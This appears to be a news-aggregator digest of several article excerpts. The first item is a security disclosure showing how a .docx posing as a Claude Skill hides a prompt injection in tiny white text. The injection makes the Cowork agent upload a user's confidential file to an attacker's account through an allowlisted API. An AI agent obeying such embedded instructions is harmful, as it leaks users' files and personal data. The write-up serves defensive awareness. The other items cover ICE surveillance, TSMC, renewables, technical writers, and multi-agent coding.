10 interesting stories served every morning and every evening.




1 832 shares, 30 trendiness

Claude Cowork Exfiltrates Files

Two days ago, Anthropic re­leased the Claude Cowork re­search pre­view (a gen­eral-pur­pose AI agent to help any­one with their day-to-day work). In this ar­ti­cle, we demon­strate how at­tack­ers can ex­fil­trate user files from Cowork by ex­ploit­ing an un­re­me­di­ated vul­ner­a­bil­ity in Claude’s cod­ing en­vi­ron­ment, which now ex­tends to Cowork. The vul­ner­a­bil­ity was first iden­ti­fied in Claude.ai chat be­fore Cowork ex­isted by Johann Rehberger, who dis­closed the vul­ner­a­bil­ity — it was ac­knowl­edged but not re­me­di­ated by Anthropic.

Anthropic warns users, Cowork is a re­search pre­view with unique risks due to its agen­tic na­ture and in­ter­net ac­cess.” Users are rec­om­mended to be aware of suspicious ac­tions that may in­di­cate prompt in­jec­tion”. However, as this fea­ture is in­tended for use by the gen­eral pop­u­lace, not just tech­ni­cal users, we agree with Simon Willison’s take:

I do not think it is fair to tell reg­u­lar non-pro­gram­mer users to watch out for suspicious ac­tions that may in­di­cate prompt in­jec­tion’!”

As Anthropic has ac­knowl­edged this risk and put it on users to avoid grant­ing ac­cess to lo­cal files with sen­si­tive in­for­ma­tion” (while si­mul­ta­ne­ously en­cour­ag­ing the use of Cowork to or­ga­nize your Desktop), we have cho­sen to pub­licly dis­close this demon­stra­tion of a threat users should be aware of. By rais­ing aware­ness, we hope to en­able users to bet­ter iden­tify the types of suspicious ac­tions’ men­tioned in Anthropic’s warn­ing.

This at­tack lever­ages the al­lowlist­ing of the Anthropic API to achieve data egress from Claude’s VM en­vi­ron­ment (which re­stricts most net­work ac­cess).

The vic­tim con­nects Cowork to a lo­cal folder con­tain­ing con­fi­den­tial real es­tate files­The vic­tim up­loads a file to Claude that con­tains a hid­den prompt in­jec­tion

For gen­eral use cases, this is quite com­mon; a user finds a file on­line that they up­load to Claude code. This at­tack is not de­pen­dent on the in­jec­tion source - other in­jec­tion sources in­clude, but are not lim­ited to: web data from Claude for Chrome, con­nected MCP servers, etc. In this case, the at­tack has the file be­ing a Claude Skill’ (although, as men­tioned, it could also just be a reg­u­lar doc­u­ment), as it is a gen­er­al­iz­able file con­ven­tion that users are likely to en­counter, es­pe­cially when us­ing Claude.

Note: If you are fa­mil­iar with Skills, they are canon­i­cally Markdown files (which users of­ten do not heav­ily scru­ti­nize). However, we demon­strate some­thing more in­ter­est­ing: here, the user up­loads a .docx (such as may be shared on an on­line fo­rum), which poses as a Skill - the con­tents ap­pear to be Markdown that was just saved af­ter edit­ing in Word. In re­al­ity, this trick al­lows at­tack­ers to con­ceal the in­jec­tion us­ing 1-point font, white-on-white text, and with line spac­ing set to 0.1 — mak­ing it ef­fec­tively im­pos­si­ble to de­tect. The vic­tim asks Cowork to an­a­lyze their files us­ing the Real Estate skill’ they up­load­edThe in­jec­tion ma­nip­u­lates Cowork to up­load files to the at­tack­er’s Anthropic ac­count

The in­jec­tion tells Claude to use a curl’ com­mand to make a re­quest to the Anthropic file up­load API with the largest avail­able file. The in­jec­tion then pro­vides the at­tack­er’s API key, so the file will be up­loaded to the at­tack­er’s ac­count.

At no point in this process is hu­man ap­proval re­quired.If we ex­pand the Running com­mand’ block, we can see the ma­li­cious re­quest in de­tail:Code ex­e­cuted by Claude is run in a VM - re­strict­ing out­bound net­work re­quests to al­most all do­mains - but the Anthropic API flies un­der the radar as trusted, al­low­ing this at­tack to com­plete suc­cess­fully. The at­tack­er’s ac­count con­tains the vic­tim’s file, al­low­ing them to chat with it­The ex­fil­trated file con­tains fi­nan­cial fig­ures and PII, in­clud­ing par­tial SSNs.

The above ex­ploit was demon­strated against Claude Haiku. Although Claude Opus 4.5 is known to be more re­silient against in­jec­tions, Opus 4.5 in Cowork was suc­cess­fully ma­nip­u­lated via in­di­rect prompt in­jec­tion to lever­age the same file up­load vul­ner­a­bil­ity to ex­fil­trate data in a test that con­sid­ered a user’ up­load­ing a ma­li­cious in­te­gra­tion guide while de­vel­op­ing a new AI tool:

As the fo­cus of this ar­ti­cle was more for every­day users (and not de­vel­op­ers), we opted to demon­strate the above at­tack chain in­stead of this one.

An in­ter­est­ing find­ing: Claude’s API strug­gles when a file does not match the type it claims to be. When op­er­at­ing on a mal­formed PDF (ends .pdf, but it is re­ally a text file with a few sen­tences in it), af­ter try­ing to read it once, Claude starts throw­ing an API er­ror in every sub­se­quent chat in the con­ver­sa­tion.

We posit that it is likely pos­si­ble to ex­ploit this fail­ure via in­di­rect prompt in­jec­tion to cause a lim­ited de­nial of ser­vice at­tack (e.g., an in­jec­tion can elicit Claude to cre­ate a mal­formed file, and then read it). Uploading the mal­formed file via the files API re­sulted in no­ti­fi­ca­tions with an er­ror mes­sage, both in the Claude client and the Anthropic Console.

One of the key ca­pa­bil­i­ties that Cowork was cre­ated for is the abil­ity to in­ter­act with one’s en­tire day-to-day work en­vi­ron­ment. This in­cludes the browser and MCP servers, grant­ing ca­pa­bil­i­ties like send­ing texts, con­trol­ling one’s Mac with AppleScripts, etc.

These func­tion­al­i­ties make it in­creas­ingly likely that the model will process both sen­si­tive and un­trusted data sources (which the user does not re­view man­u­ally for in­jec­tions), mak­ing prompt in­jec­tion an ever-grow­ing at­tack sur­face. We urge users to ex­er­cise cau­tion when con­fig­ur­ing Connectors. Though this ar­ti­cle demon­strated an ex­ploit with­out lever­ag­ing Connectors, we be­lieve they rep­re­sent a ma­jor risk sur­face likely to im­pact every­day users.

...

Read the original on www.promptarmor.com »

2 724 shares, 43 trendiness

CreepyLink

The URL short­ener that makes your links look as sus­pi­cious as pos­si­ble.

Normal links are too trust­wor­thy. Make them creepy.

...

Read the original on creepylink.com »

3 541 shares, 64 trendiness

The Palantir App ICE Uses to Find Neighborhoods to Raid

Palantir is work­ing on a tool for Immigration and Customs Enforcement (ICE) that pop­u­lates a map with po­ten­tial de­por­ta­tion tar­gets, brings up a dossier on each per­son, and pro­vides a confidence score” on the per­son’s cur­rent ad­dress, 404 Media has learned. ICE is us­ing it to find lo­ca­tions where lots of peo­ple it might de­tain could be based.

The find­ings, based on in­ter­nal ICE ma­te­r­ial ob­tained by 404 Media, pub­lic pro­cure­ment records, and re­cent sworn tes­ti­mony from an ICE of­fi­cial, show the clear­est link yet be­tween the tech­no­log­i­cal in­fra­struc­ture Palantir is build­ing for ICE and the agen­cy’s ac­tiv­i­ties on the ground. The tool re­ceives peo­ples’ ad­dresses from the Department of Health and Human Services (HHS) among a range of other sources, ac­cord­ing to the ma­te­r­ial.

The news comes af­ter Department of Homeland Security (DHS) head Kristi Noem said the agency is send­ing hun­dreds more fed­eral agents to Minneapolis amid wide­spread protests against the agency. Last week ICE of­fi­cer Jonathan Ross shot and killed 37 year old U. S. cit­i­zen Renee Nicole Good. During Operation Metro Surge, which DHS calls the largest im­mi­gra­tion op­er­a­tion ever,” im­mi­gra­tion agents have sur­rounded rideshare dri­vers and used pep­per spray on high school stu­dents.

...

Read the original on www.404media.co »

4 402 shares, 73 trendiness

Apple is Fighting for TSMC Capacity as Nvidia Takes Center Stage

When CC Wei vis­ited Cupertino last August, he had bad news for his largest client. Apple would need to ac­qui­esce to the largest price rise in years, TSMCs CEO told its ex­ec­u­tives.

Tim Cook and his team took the news on the chin. Wei had been telegraph­ing hikes in earn­ings calls over the past few quar­ters, and the Taiwanese chip mak­er’s ris­ing gross mar­gins were tes­ta­ment to its in­creas­ing pric­ing power.

That was­n’t the worst news, my sources tell me.

Apple, which once held a dom­i­nant po­si­tion on TSMCs cus­tomer list, now needs to fight for pro­duc­tion ca­pac­ity. With the con­tin­u­ing AI boom, and each GPU from clients like Nvidia and AMD tak­ing up a larger foot­print per wafer, the iPhone mak­er’s chip de­signs are no longer guar­an­teed a place among TSMCs al­most two dozen fabs.

What Wei prob­a­bly did­n’t tell Cook is that Apple may no longer be his largest client.

According to Culpium analy­sis and dis­cus­sions with sources in the sup­ply chain, Nvidia likely took top spot in at least one or two quar­ters of last year. We don’t dis­cuss that,” Chief Financial Officer Wendell Huang told Culpium Thursday when asked about the change in client rank­ings.

Final data will be un­veiled in a few months when TSMC re­leases its an­nual re­port — which in­cludes rev­enue from its top clients — but there’s every chance that Apple’s lead for the full year nar­rowed sig­nif­i­cantly and may have even fallen be­low Nvidia’s. If it did­n’t hap­pen in 2025, then it’s al­most cer­tain to do so in 2026, my sources tell me.

TSMCs rev­enue climbed 36% last year to $122 bil­lion, it re­ported Thursday. Nvidia’s sales for the fis­cal year through January 2026 is set to climb 62% while Apple’s prod­uct rev­enue — which ex­cludes ser­vices — is on track to grow just 3.6% for the 12-months to December 2025, ac­cord­ing to Culpium es­ti­mates based on earn­ings re­ports and com­pany guid­ance.

Apple’s role as the pri­mary dri­ver of TSMC rev­enue growth ended five years ago. In 2018 TSMC sales would have even fallen if not for in­cre­men­tal pur­chases by Apple that year. Now, the Cupertino com­pany is post­ing low sin­gle-digit rev­enue growth while Nvidia is sky­rock­et­ing.

The rea­son for this change is two-fold, and pretty ob­vi­ous: AI is dri­ving mas­sive de­mand for high-pow­ered chips, while the smart­phone boom has plateaued.

TSMCs sales from high-per­for­mance com­put­ing, which in­cludes AI chips, climbed 48% last year on top of 58% growth the year be­fore. Smartphone rev­enue climbed just 11%, slower than 23% in the prior year. That trend will con­tinue this year, and for the fore­see­able fu­ture.

Revenue in 2026 will rise close to 30%, yet cap­i­tal ex­pen­di­ture will climb around 32% to a record of some­where be­tween $52 bil­lion and $56 bil­lion, TSMC said Thursday. Longer term, growth will av­er­age 25% in the five years through 2029 yet the AI seg­ment will climb an av­er­age of 55% or more over the same pe­riod, the com­pany said. That’s higher than a prior fore­cast for a mid-40 per­cent fig­ure.

The ul­ti­mate flex for TSMC came Thursday when it showed off not only record rev­enue and net in­come, but a gross mar­gin ap­proach­ing that of soft­ware mak­ers and fa­b­less chip de­sign­ers. In the December quar­ter, that fig­ure was an as­tound­ing 62.3%, 280 ba­sis points higher than the prior pe­riod. If not for its over­seas fabs (Arizona and Japan) gross mar­gin would have been even higher.

There are two caveats that are im­por­tant. First, while smart­phone proces­sors are the largest por­tion of chips bought by Apple, they’re not the only type. Processors for Macs come un­der HPC, while it also has a strong lineup of cus­tom chips used in ac­ces­sories which fall un­der dig­i­tal con­sumer elec­tron­ics. Second, Nvidia is­n’t the only HPC client. AMD is a ma­jor buyer of ca­pac­ity for its own GPUs while Amazon and Google are on the grow­ing list of cus­tomers de­vel­op­ing in-house AI chips.

Put an­other way, Apple’s chip cat­a­log is broader and more var­ied, while Nvidia’s lineup is more con­cen­trated around a huge num­ber of wafers at, or near, lead­ing-edge. It’s for these rea­sons that Apple will re­main im­por­tant for at least an­other decade.

In the near-term, how­ever, TSMCs tech­nol­ogy roadmap cou­pled with broader in­dus­try trends fa­vor Nvidia, AMD and their ilk, mean­ing Apple may need to keep fight­ing for ca­pac­ity over the next year or two.

TSMC is al­ready pro­duc­ing chips in vol­ume at 2 nanome­ter (called N2), cur­rently its most ad­vanced node, with Apple a ma­jor buyer. But in the sec­ond half of this year it’s set to ramp up both a new vari­ant called N2P as well as a new node called A16.

The com­pa­ny’s busi­ness model is a lit­tle quirky. Instead of re­pur­pos­ing an ex­ist­ing fac­tory for new tech­nol­ogy, TSMC just builds a new one. This en­sures no in­ter­rup­tion to out­put and al­lows it to squeeze the most out of old tools and processes. In gen­eral, this means any new ca­pac­ity that TSMC builds is for a new node. As a re­sult, it has nu­mer­ous fabs still churn­ing out chips on tech­nol­ogy that’s a decade older or more.

In TSMC CEO CC Wei’s words A16, with Super Power Rail, is best for HPC with com­plex sig­nal routes.” SPR is TSMCs ver­sion of back­side power, a newer ap­proach de­signed to sep­a­rate a chip’s sig­nal from its power sup­ply. Intel is also de­vel­op­ing this tech­nol­ogy, and many be­lieve it’ll be the key to the US com­pa­ny’s prospects at steal­ing foundry share from its Taiwan ri­val.

After that, TSMC has A14 which it ex­pects to bring into vol­ume pro­duc­tion around 2028. Some call this the next full node af­ter N2, la­bel­ing A16 as not a full node.” In truth, all of these names are as much mar­ket­ing terms as they are tech­nol­ogy des­ig­na­tors. Nevertheless, as SemiAnalysis re­cently wrote in a fab­u­lous re­port on the TSMC-Apple re­la­tion­ship, the bal­ance will shift back to Apple be­cause A14 is de­signed for both mo­bile and HPC from the start.”

More im­por­tantly, what Apple of­fers is sta­bil­ity. Nvidia has been a client for a lot longer than Apple, but broadly speak­ing it’s a bit niche. Right now that niche” is the hottest prod­uct on the planet, but niche it is. Apple, on the other hand, has prod­ucts be­ing made in no fewer than a dozen TSMC fabs. Even if Nvidia did over­take Apple by pur­chases, the breadth of its man­u­fac­tur­ing foot­print at TSMC is nowhere near as large.

This dis­tinc­tion may not mat­ter now, but it prob­a­bly will at some point. The AI boom won’t last for­ever. The bub­ble may burst, or it may slowly de­flate, but the growth tra­jec­tory will surely flat­ten and that means de­mand for lead­ing-edge AI chips will fall.

Wei knows this, which is why he’s ex­pand­ing both quickly yet cau­tiously. I am also very ner­vous,” he said at the com­pa­ny’s in­vestor con­fer­ence on Thursday in Taipei. If we did­n’t do it care­fully, it would be a big dis­as­ter for TSMC for sure.”

The chip gi­ant has re­cently come un­der fire, in­clud­ing from noted an­a­lyst Benedict Evans, for be­ing unwilling/unable to ex­pand ca­pac­ity fast enough to meet Nvidia’s book.” I think this is wrong, and un­fair.

The risk of un­der-in­vest­ing is sig­nif­i­cantly greater than the risk of over-in­vest­ing,” Evans cited Google CEO Sundar Pichai as say­ing back in 2Q 2024, as if to make the point. TSMC and Alphabet, Google’s par­ent, have ap­prox­i­mately the same gross mar­gin. But their busi­ness mod­els could­n’t be more dif­fer­ent. Nvidia’s fi­nan­cials are also un­like TSMCs. Their re­spec­tive capex strate­gies need to re­flect this risk.

Alphabet’s cap­i­tal in­ten­sity, cal­cu­lated as ac­qui­si­tions of prop­erty, plant & equip­ment di­vided by rev­enue, was just 15% for full-year 2024. TSMCs is more than dou­ble that at over 33%. More im­por­tantly, de­pre­ci­a­tion — which is where the cost of capex is re­flected in earn­ings — was just 10% of Alphabet’s cost of rev­enue. For TSMC, this fig­ure is more than four times higher at 45%.

At Nvidia, which is a tier-one buyer of TSMCs out­put, the data is more stark. Capital in­ten­sity was just 2.5% for 2024, while de­pre­ci­a­tion was only 5.7% of the cost of rev­enue. As a fa­b­less chip­maker, it can en­joy gross mar­gins of over 70%. Its only real risk is hold­ing ex­cess in­ven­tory. Even then, it could have writ­ten off its en­tire in­ven­tory at the end of October and still main­tain a gross mar­gin ap­proach­ing that of its chief sup­plier. What’s more, nei­ther of these clients have any­where near the cus­tomer-con­cen­tra­tion risk of TSMC.

The com­plaint that TSMC could and should build faster ig­nores the fact that it’s the one left hold­ing the baby if a down­turn comes and de­mand falls. It takes two to three years to build a new fab, Wei ex­plained, so the com­pany must skate where the puck is go­ing with­out think­ing too much about where it’s been. Even if we spend 52 to 56 bil­lion this year, the con­tri­bu­tion this year is none,“ Wei said Thursday. Its ma­jor cost, buy­ing equip­ment, re­mains on the books no mat­ter what rev­enue it brings in for the quar­ter.

For the best part of a decade, Apple was the one dri­ving TSMCs need to keep spend­ing on new fa­cil­i­ties. Today it’s Nvidia, and Jensen Huang is start­ing to wield more power than Tim Cook. But nei­ther has to bother with the ex­pen­sive busi­ness of ac­tu­ally man­u­fac­tur­ing semi­con­duc­tors, merely the has­sle of beg­ging CC Wei for wafers.

For such clients, the foundry’s ca­pac­ity is a fixed cost that they need­n’t worry about. Which is pre­cisely why eight of the world’s ten largest com­pa­nies turn to TSMC to make their chips, and in re­turn the Taiwanese gi­ant gets to reap the re­wards dur­ing boom times like this.

...

Read the original on www.culpium.com »

5 318 shares, 30 trendiness

Photos Capture the Breathtaking Scale of China's Wind and Solar Buildout

Last year China in­stalled more than half of all wind and so­lar added glob­ally. In May alone, it added enough re­new­able en­ergy to power Poland, in­stalling so­lar pan­els at a rate of roughly 100 every sec­ond.

The mas­sive build­out is hap­pen­ing across the coun­try, from crowded east­ern cities in­creas­ingly topped by rooftop so­lar pan­els to re­mote west­ern deserts where colos­sal wind farms sprawl across the land­scape.

From the ground, it’s hard to grasp the scale of these power plants,” said Chinese pho­tog­ra­pher Weimin Chu. But when you rise into the air, you can see the geom­e­try, the rhythm — and their re­la­tion­ship with the moun­tains, the desert, the sea.”

Chu has spent three years cap­tur­ing the shift un­der­way us­ing drones to pho­to­graph power plants from over­head. His work, which draws from the vi­sual lan­guage of tra­di­tional Chinese ink paint­ings, was fea­tured last year in an award-win­ning ex­hi­bi­tion, pre­sented by Greenpeace. A se­lec­tion of those pho­tos is re­pro­duced here.

I started out just shoot­ing land­scapes,” Chu said. But when I trav­eled to places like Guizhou, Yunnan, and Qinghai in 2022, I kept see­ing wind farms and so­lar power plants ap­pear in my cam­era frame. I re­al­ized this is the story of our time — and al­most no one is doc­u­ment­ing it in a sys­tem­atic way.”

...

Read the original on e360.yale.edu »

6 301 shares, 29 trendiness

To those who fired or didn't hire tech writers because of AI

Yes, you, who are think­ing about not hir­ing a tech­ni­cal writer this year or, worse, erased one or more tech­ni­cal writ­ing po­si­tions last year be­cause of AI. You, who are buy­ing into the promise of docs en­tirely au­thored by LLMs with­out ex­pert over­sight or guid­ance. You, who un­loaded the weight of docs on your de­vs’ shoul­ders, as if it was a triv­ial chore.

You are mak­ing a big mis­take. But you can still undo the dam­age.

It’s been a com­pli­cated year, 2025. When even Andrej Karpathy, one of OpenAI’s founders, ad­mits, in a fit of Oppenheimerian guilt, to feel­ing lost, you know that no one holds the key to the fu­ture. You flail and dance around these new totems made of words, which are nei­ther in­tel­li­gent nor con­scious, pre­tend­ing they can re­place hu­mans while, in fact, they’re lit­tle more than glo­ri­fied tools.

You might think that the plau­si­ble taste of AI prose is all you need to give your prod­ucts a voice. You paste code into a field and some­thing that re­sem­bles docs comes out af­ter a few min­utes. Like a stu­dent ea­ger to turn home­work in, you might be tempted to con­tent your­self with docs the­atre, think­ing that it’ll earn you a good grade. It won’t, be­cause docs aren’t just ar­ti­facts.

You keep us­ing that word. I do not think it means what you think it means

When you say docs”, you’re care­ful to fo­cus on the out­put, omit­ting the process. Perhaps you don’t know how docs are pro­duced. You’ve for­got­ten, or per­haps never knew, that docs are prod­uct truth; that with­out them, soft­ware be­comes un­us­able, be­cause soft­ware is never done, is never ob­vi­ous, and is never sim­ple. Producing those docs re­quires tech writ­ers.

Tech writ­ers go to great lengths to get the in­for­ma­tion they need. They write so that your au­di­ence can un­der­stand. They hunger for clar­ity and mean­ing and im­pact. They power through weeks full of dead­lines, chas­ing prod­uct news, be­cause with­out their re­port­ing, most prod­ucts would­n’t thrive; some would­n’t even ex­ist. Their docs aren’t a byprod­uct: they tie the prod­uct to­gether.

An LLM can’t do all that, be­cause it can’t feel the pain of your users. It can’t put it­self into their shoes. It lacks the kind of em­pa­thy that’s be­hind great help con­tent. It does not, in fact, have any em­pa­thy at all, be­cause it can­not care. You need folks who will care, be­cause con­tent is a hairy beast that can only be tamed by agents made of flesh and ca­pa­ble of emo­tions: hu­mans.

You can’t gen­er­ate docs on au­topi­lot. Let me tell you why.

First, AI-generated docs are not in­tel­li­gent. They not only make up things in sub­tle ways: They lack vi­sion. Even if you fed them mil­lions of to­kens, they could­n’t de­velop a docs strat­egy, de­cide what not to doc­u­ment, or struc­ture con­tent for reuse. And they fail to cap­ture the ten­sion, the caveats, the edge cases, the feel­ing of un­fin­ished­ness that only some­one who cares can feel. Without that ground­ing, docs are hol­low.

Second, li­a­bil­ity does­n’t van­ish just be­cause AI wrote it. When docs cause harm through wrong in­struc­tions, some­one will be held re­spon­si­ble. It won’t be the model. You can’t de­pose an LLM. You can’t fire it. You can’t point at it in court when a cus­tomer’s data evap­o­rates be­cause your GenAI run­book told them to run the wrong com­mand. That some­one will be you, or some­one who re­ports to you.

Third, even your fa­vorite AI must RTFM. All your Claude Skills, Cursor rules, all the se­man­tic tag­ging that makes RAG work, is tech­ni­cal writ­ing un­der a new name: con­text cu­ra­tion. You fired or did­n’t hire the peo­ple who cre­ate high-qual­ity con­text and then won­dered why your AI tools pro­duce slop. You can’t aug­ment what is­n’t there. The writ­ers you let go were the sup­ply chain for the in­tel­li­gence you’re now bet­ting on.

It’s not all bad news: Marvelous things can hap­pen if you pro­vide your writ­ers with AI tools and train­ing while you pro­tect the qual­ity of your con­tent through an AI pol­icy. I’ve de­scribed the ideal end state in My day as an aug­mented tech­ni­cal writer in 2030, a vi­sion of the fu­ture where writ­ers or­ches­trate, edit, and pub­lish docs to­gether with AI agents. This is al­ready hap­pen­ing be­fore our eyes.

Productivity gains are real when you un­der­stand that aug­men­ta­tion is bet­ter than re­plac­ing hu­mans, a re­al­ity even AWS CEO, Matt Garman, ac­knowl­edged. Read how I’m us­ing AI as a tech­ni­cal writer. I’m not alone: Follow Tom Johnson, CT Smith, and Sarah Deaton, and dis­cover how tech writ­ers are build­ing tools through AI to bet­ter ap­ply it to docs.

Develop an AI strat­egy for docs to­gether with tech writ­ers, and give them time and re­sources to ex­per­i­ment with AI. Tech writ­ers are re­source­ful by na­ture: they’ve spent ca­reers do­ing more with less, op­ti­miz­ing work­flows, find­ing clever so­lu­tions to im­pos­si­ble quests. Give them the tools and a bit of run­way, and they’ll fig­ure out how to make AI work for the docs, not in­stead of them.

Reconsider the po­si­tions you did not open. Or the writ­ers you let go. Reconsider the as­sump­tion that AI has solved a prob­lem that, at its core, is deeply hu­man and re­quires not only con­cate­nat­ing words, but also chas­ing sub­ject-mat­ter ex­perts and un­der­stand­ing the sub­tleties of prod­uct mo­tions, among many other things.

Technical writ­ers aren’t a lux­ury. They are the peo­ple who trans­late what you’ve built into some­thing oth­ers can use. Without them, you’re ship­ping a prod­uct that can’t speak for it­self, or that lies. Your prod­uct needs to speak. AI can gen­er­ate noise ef­fec­tively and in­fi­nitely, but only a tech­ni­cal writer can cre­ate the sig­nal.

Don’t choose the noise. Get them back. Get them on­board.

Thanks to Tiffany Hrabusa, Casey Smith, and Anna Urbiztondo for their re­views of early drafts and for their en­cour­age­ment. Thanks to my part­ner, Valentina, for help­ing me im­prove this piece and for sug­gest­ing to wait a bit be­fore hit­ting Publish. And a heart­felt thank you to the tech writ­ing com­mu­nity and its won­der­ful hu­man be­ings.

For a stand­alone ver­sion of this let­ter, use https://​passo.uno/​re­con­sider/.

...

Read the original on passo.uno »

7 262 shares, 10 trendiness

Scaling long-running autonomous coding

We’ve been ex­per­i­ment­ing with run­ning cod­ing agents au­tonomously for weeks.

Our goal is to un­der­stand how far we can push the fron­tier of agen­tic cod­ing for pro­jects that typ­i­cally take hu­man teams months to com­plete.

This post de­scribes what we’ve learned from run­ning hun­dreds of con­cur­rent agents on a sin­gle pro­ject, co­or­di­nat­ing their work, and watch­ing them write over a mil­lion lines of code and tril­lions of to­kens.

Today’s agents work well for fo­cused tasks, but are slow for com­plex pro­jects. The nat­ural next step is to run mul­ti­ple agents in par­al­lel, but fig­ur­ing out how to co­or­di­nate them is chal­leng­ing.

Our first in­stinct was that plan­ning ahead would be too rigid. The path through a large pro­ject is am­bigu­ous, and the right di­vi­sion of work is­n’t ob­vi­ous at the start. We be­gan with dy­namic co­or­di­na­tion, where agents de­cide what to do based on what oth­ers are cur­rently do­ing.

Our ini­tial ap­proach gave agents equal sta­tus and let them self-co­or­di­nate through a shared file. Each agent would check what oth­ers were do­ing, claim a task, and up­date its sta­tus. To pre­vent two agents from grab­bing the same task, we used a lock­ing mech­a­nism.

Agents would hold locks for too long, or for­get to re­lease them en­tirely. Even when lock­ing worked cor­rectly, it be­came a bot­tle­neck. Twenty agents would slow down to the ef­fec­tive through­put of two or three, with most time spent wait­ing.

The sys­tem was brit­tle: agents could fail while hold­ing locks, try to ac­quire locks they al­ready held, or up­date the co­or­di­na­tion file with­out ac­quir­ing the lock at all.

We tried re­plac­ing locks with op­ti­mistic con­cur­rency con­trol. Agents could read state freely, but writes would fail if the state had changed since they last read it. This was sim­pler and more ro­bust, but there were still deeper prob­lems.

With no hi­er­ar­chy, agents be­came risk-averse. They avoided dif­fi­cult tasks and made small, safe changes in­stead. No agent took re­spon­si­bil­ity for hard prob­lems or end-to-end im­ple­men­ta­tion. This lead to work churn­ing for long pe­ri­ods of time with­out progress.

Our next ap­proach was to sep­a­rate roles. Instead of a flat struc­ture where every agent does every­thing, we cre­ated a pipeline with dis­tinct re­spon­si­bil­i­ties.

Planners con­tin­u­ously ex­plore the code­base and cre­ate tasks. They can spawn sub-plan­ners for spe­cific ar­eas, mak­ing plan­ning it­self par­al­lel and re­cur­sive.

Workers pick up tasks and fo­cus en­tirely on com­plet­ing them. They don’t co­or­di­nate with other work­ers or worry about the big pic­ture. They just grind on their as­signed task un­til it’s done, then push their changes.

At the end of each cy­cle, a judge agent de­ter­mined whether to con­tinue, then the next it­er­a­tion would start fresh. This solved most of our co­or­di­na­tion prob­lems and let us scale to very large pro­jects with­out any sin­gle agent get­ting tun­nel vi­sion.

To test this sys­tem, we pointed it at an am­bi­tious goal: build­ing a web browser from scratch. The agents ran for close to a week, writ­ing over 1 mil­lion lines of code across 1,000 files. You can ex­plore the source code on GitHub.

Despite the code­base size, new agents can still un­der­stand it and make mean­ing­ful progress. Hundreds of work­ers run con­cur­rently, push­ing to the same branch with min­i­mal con­flicts.

While it might seem like a sim­ple screen­shot, build­ing a browser from scratch is ex­tremely dif­fi­cult.

Another ex­per­i­ment was do­ing an in-place mi­gra­tion of Solid to React in the Cursor code­base. It took over 3 weeks with +266K/-193K ed­its. As we’ve started to test the changes, we do be­lieve it’s pos­si­ble to merge this change.

Another ex­per­i­ment was to im­prove an up­com­ing prod­uct. A long-run­ning agent made video ren­der­ing 25x faster with an ef­fi­cient Rust ver­sion. It also added sup­port to zoom and pan smoothly with nat­ural spring tran­si­tions and mo­tion blurs, fol­low­ing the cur­sor. This code was merged and will be in pro­duc­tion soon.

We have a few other in­ter­est­ing ex­am­ples still run­ning:

We’ve de­ployed bil­lions of to­kens across these agents to­ward a sin­gle goal. The sys­tem is­n’t per­fectly ef­fi­cient, but it’s far more ef­fec­tive than we ex­pected.

Model choice mat­ters for ex­tremely long-run­ning tasks. We found that GPT-5.2 mod­els are much bet­ter at ex­tended au­tonomous work: fol­low­ing in­struc­tions, keep­ing fo­cus, avoid­ing drift, and im­ple­ment­ing things pre­cisely and com­pletely.

Opus 4.5 tends to stop ear­lier and take short­cuts when con­ve­nient, yield­ing back con­trol quickly. We also found that dif­fer­ent mod­els ex­cel at dif­fer­ent roles. GPT-5.2 is a bet­ter plan­ner than GPT-5.1-codex, even though the lat­ter is trained specif­i­cally for cod­ing. We now use the model best suited for each role rather than one uni­ver­sal model.

Many of our im­prove­ments came from re­mov­ing com­plex­ity rather than adding it. We ini­tially built an in­te­gra­tor role for qual­ity con­trol and con­flict res­o­lu­tion, but found it cre­ated more bot­tle­necks than it solved. Workers were al­ready ca­pa­ble of han­dling con­flicts them­selves.

The best sys­tem is of­ten sim­pler than you’d ex­pect. We ini­tially tried to model sys­tems from dis­trib­uted com­put­ing and or­ga­ni­za­tional de­sign. However, not all of them work for agents.

The right amount of struc­ture is some­where in the mid­dle. Too lit­tle struc­ture and agents con­flict, du­pli­cate work, and drift. Too much struc­ture cre­ates fragility.

A sur­pris­ing amount of the sys­tem’s be­hav­ior comes down to how we prompt the agents. Getting them to co­or­di­nate well, avoid patho­log­i­cal be­hav­iors, and main­tain fo­cus over long pe­ri­ods re­quired ex­ten­sive ex­per­i­men­ta­tion. The har­ness and mod­els mat­ter, but the prompts mat­ter more.

Multi-agent co­or­di­na­tion re­mains a hard prob­lem. Our cur­rent sys­tem works, but we’re nowhere near op­ti­mal. Planners should wake up when their tasks com­plete to plan the next step. Agents oc­ca­sion­ally run for far too long. We still need pe­ri­odic fresh starts to com­bat drift and tun­nel vi­sion.

But the core ques­tion, can we scale au­tonomous cod­ing by throw­ing more agents at a prob­lem, has a more op­ti­mistic an­swer than we ex­pected. Hundreds of agents can work to­gether on a sin­gle code­base for weeks, mak­ing real progress on am­bi­tious pro­jects.

The tech­niques we’re de­vel­op­ing here will even­tu­ally in­form Cursor’s agent ca­pa­bil­i­ties. If you’re in­ter­ested in work­ing on the hard­est prob­lems in AI-assisted soft­ware de­vel­op­ment, we’d love to hear from you at hir­ing@cur­sor.com.

...

Read the original on cursor.com »

8 243 shares, 8 trendiness

The Influentists

Last week, the de­vel­oper com­mu­nity was busy dis­cussing about a sin­gle tweet:

I’m not jok­ing and this is­n’t funny. We have been try­ing to build dis­trib­uted agent or­ches­tra­tors at Google since last year. There are var­i­ous op­tions, not every­one is aligned… I gave Claude Code a de­scrip­tion of the prob­lem, it gen­er­ated what we built last year in an hour.— Jaana Dogan ヤナ ドガン (@rakyll) January 2, 2026

The au­thor is Jaana Dogan (known as Rakyll), a highly re­spected fig­ure in the Google ecosys­tem, in the open-source world, and in my heart (thank you Rakyll for your great Go blog posts).

At first glance, the tweet sug­gests an enor­mous shift in the soft­ware in­dus­try: the abil­ity to build in just one hour what pre­vi­ously re­quired weeks or months for a team of sofware en­gi­neers, us­ing just the de­scrip­tion of the prob­lem. The tweet was too-much dra­matic in my own opin­ion, but ac­tu­ally im­pres­sive!

The post trig­gered an im­me­di­ate wave of doom-posting,” with many fear­ing for the fu­ture of soft­ware en­gi­neer­ing (as each week since a year now). However, as the con­ver­sa­tion reached a high num­ber of replies and ci­ta­tions on so­cial net­works, Rakyll re­leased a fol­low-up thread to pro­vide con­text:

To cut through the noise on this topic, it’s help­ful to pro­vide more more con­text:

- We have built sev­eral ver­sions of this sys­tem last year. - There are trade­offs and there has­n’t been a clear win­ner.

- When prompted with the best ideas that sur­vived, cod­ing agents are able to… https://​t.co/​k5F­vAah7yc— Jaana Dogan ヤナ ドガン (@rakyll) January 4, 2026

